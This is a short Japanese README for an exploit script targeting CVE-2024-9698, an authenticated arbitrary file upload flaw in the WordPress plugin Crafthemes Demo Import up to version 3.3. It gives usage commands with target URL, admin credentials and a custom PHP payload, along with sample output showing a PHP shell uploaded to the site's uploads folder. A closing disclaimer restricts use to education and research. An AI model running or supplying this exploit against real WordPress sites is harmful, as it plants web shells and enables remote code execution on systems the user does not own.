
Crafthemes Demo Import <= 3.3 - 認証済み(管理者+)任意ファイルアップロード(process_uploaded_files 内)
このエクスプロイトは、WordPress用プラグイン Crafthemes Demo Import の重大な脆弱性 (CVE-2024-9698) を狙います。この脆弱性により、認証された管理者が影響を受けるWordPressサイトに任意のファイルをアップロードできるようになり、潜在的なリモートコード実行 (RCE) につながる可能性があります。
process_uploaded_filesreadme.txt から情報を抽出してプラグインのバージョンをチェックします。admin-ajax.php を使用してカスタムPHPシェルをアップロードします。python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password"
カスタムPHPペイロードをアップロードする場合は、次のようにします:
python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password" --payload "<?php phpinfo(); ?>"
[+] Target is vulnerable, proceeding with exploit...
[+] Logged in successfully.
[+] Extracted nonce: abc123xyz
[+] Shell uploaded successfully: http://target.com/wp-content/uploads/2025/02/Nxploit.php
免責事項: このスクリプトは教育およびセキュリティ研究の目的のみに使用されることを意図しています。明示的な許可なくシステムに対して不正に使用することは違法です。